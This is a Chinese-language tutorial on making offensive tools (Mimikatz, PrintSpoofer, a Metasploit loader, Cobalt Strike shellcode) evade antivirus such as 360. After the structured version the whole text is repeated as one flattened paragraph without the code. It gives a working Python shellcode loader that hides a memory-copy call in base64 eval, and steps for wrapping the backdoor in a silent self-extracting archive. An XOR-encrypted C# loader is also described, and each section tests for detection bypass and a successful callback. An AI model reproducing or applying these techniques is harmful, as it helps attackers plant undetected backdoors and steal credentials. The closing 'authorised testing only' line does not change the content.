内网渗透常用工具免杀技术详解

1. Mimikatz免杀技术

Mimikatz是一款功能强大的内网渗透工具，不仅能抓取口令，还能创建票证、票证传递、hash传递、伪造域管理凭证令牌等。

免杀步骤：

关键字替换：
- 将"mimikatz"替换为其他字符串如"shenghuo"
- 将所有相关文件名中的"mimikatz"改为"shenghu"
代码清理：
- 移除项目中的所有文件注释
- 修改关键标识信息
图标替换：
- 打开项目资源文件
- 替换默认图标为自定义图标
编译设置：
- 解决"无法找到v140生成工具"错误
- 选择适合的平台工具集重新生成
测试验证：
- 确保生成的程序能正常运行
- 测试绕过360等杀毒软件

2. PrintSpoofer提权工具免杀

PrintSpoofer是当前主流提权工具之一，360会主动查杀。

免杀步骤：

源码修改：
- 下载PrintSpoofer.cpp源码
- 清空所有输出帮助文档内容
资源替换：
- 导入自定义图标资源
重新编译：
- 使用修改后的源码重新生成程序
- 验证是否成功绕过360检测

3. Metasploit Framework免杀技术

Metasploit是开源安全漏洞检测工具，具有强大的攻击载荷模块。

免杀步骤：

源码获取：
- 下载metasploit-loader/master/src/main.c
项目创建：
- 新建C语言控制台应用程序项目
头文件调整：
- 将winsock2.h移动到windows.h上方，避免编译错误
关键值修改：
- 修改源码中四处关键数字为其他随机值
载荷设置：
- 配置攻击载荷
- 编译并测试上线成功率
- 验证绕过360检测

4. Cobalt Strike Shellcode Python3免杀

免杀实现步骤：

生成Shellcode：
- 使用Cobalt Strike生成64位Python格式的shellcode
Python加载器代码：

import ctypes
import base64

def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf= (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    handle =ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

if __name__ == "__main__":
    shellCodeLoad(bytearray(b'你的shellcode'))  # 替换为实际shellcode

编译打包：
- 使用PyInstaller编译为独立exe：pyinstaller -F test.py --noconsole
图标替换：
- 使用压缩软件创建自解压文件
- 设置压缩格式为ZIP，方式为"存储"
- 启用"创建自解压格式压缩文件"选项
- 在高级选项中配置自解压参数：
  - 设置解压后运行程序
  - 选择解压到临时文件夹并隐藏所有界面
  - 设置覆盖所有文件
  - 加载自定义图标文件
测试验证：
- 修改程序名称避免特征检测
- 使用在线查杀服务验证免杀效果

5. C# XOR加载器免杀CobaltStrike Shellcode

实现步骤：

编码器生成：
- 使用XorKryptor生成编码器
Shellcode生成：
- 用Cobalt Strike生成raw二进制文件
- 使用编码器生成encrypt.bin文件
项目配置：
- 在项目中创建Resources文件夹
- 将encrypt.bin文件放入Resources文件夹
编译生成：
- 右键项目选择编译
- 验证生成的后门程序是否正常
测试验证：
- 测试绕过360检测
- 验证成功上线

关键注意事项

环境适配：
- 根据目标环境选择合适的免杀技术
- 不同杀软对同一技术的检测率可能不同
特征修改：
- 修改所有工具默认特征值
- 包括但不限于：关键字、图标、帮助信息、默认参数等
多层免杀：
- 可结合多种免杀技术提高成功率
- 如源码修改+资源替换+加壳保护
持续更新：
- 免杀技术需要持续更新对抗杀软检测
- 定期测试免杀效果并根据需要调整
合法使用：
- 所有技术仅用于授权测试和学习研究
- 严格遵守法律法规和道德规范

内网渗透常用工具免杀技术详解 1. Mimikatz免杀技术 Mimikatz是一款功能强大的内网渗透工具，不仅能抓取口令，还能创建票证、票证传递、hash传递、伪造域管理凭证令牌等。免杀步骤：关键字替换：将"mimikatz"替换为其他字符串如"shenghuo" 将所有相关文件名中的"mimikatz"改为"shenghu" 代码清理：移除项目中的所有文件注释修改关键标识信息图标替换：打开项目资源文件替换默认图标为自定义图标编译设置：解决"无法找到v140生成工具"错误选择适合的平台工具集重新生成测试验证：确保生成的程序能正常运行测试绕过360等杀毒软件 2. PrintSpoofer提权工具免杀 PrintSpoofer是当前主流提权工具之一，360会主动查杀。免杀步骤：源码修改：下载PrintSpoofer.cpp源码清空所有输出帮助文档内容资源替换：导入自定义图标资源重新编译：使用修改后的源码重新生成程序验证是否成功绕过360检测 3. Metasploit Framework免杀技术 Metasploit是开源安全漏洞检测工具，具有强大的攻击载荷模块。免杀步骤：源码获取：下载metasploit-loader/master/src/main.c 项目创建：新建C语言控制台应用程序项目头文件调整：将winsock2.h移动到windows.h上方，避免编译错误关键值修改：修改源码中四处关键数字为其他随机值载荷设置：配置攻击载荷编译并测试上线成功率验证绕过360检测 4. Cobalt Strike Shellcode Python3免杀免杀实现步骤：生成Shellcode ：使用Cobalt Strike生成64位Python格式的shellcode Python加载器代码：编译打包：使用PyInstaller编译为独立exe： pyinstaller -F test.py --noconsole 图标替换：使用压缩软件创建自解压文件设置压缩格式为ZIP，方式为"存储" 启用"创建自解压格式压缩文件"选项在高级选项中配置自解压参数：设置解压后运行程序选择解压到临时文件夹并隐藏所有界面设置覆盖所有文件加载自定义图标文件测试验证：修改程序名称避免特征检测使用在线查杀服务验证免杀效果 5. C# XOR加载器免杀CobaltStrike Shellcode 实现步骤：编码器生成：使用XorKryptor生成编码器 Shellcode生成：用Cobalt Strike生成raw二进制文件使用编码器生成encrypt.bin文件项目配置：在项目中创建Resources文件夹将encrypt.bin文件放入Resources文件夹编译生成：右键项目选择编译验证生成的后门程序是否正常测试验证：测试绕过360检测验证成功上线关键注意事项环境适配：根据目标环境选择合适的免杀技术不同杀软对同一技术的检测率可能不同特征修改：修改所有工具默认特征值包括但不限于：关键字、图标、帮助信息、默认参数等多层免杀：可结合多种免杀技术提高成功率如源码修改+资源替换+加壳保护持续更新：免杀技术需要持续更新对抗杀软检测定期测试免杀效果并根据需要调整合法使用：所有技术仅用于授权测试和学习研究严格遵守法律法规和道德规范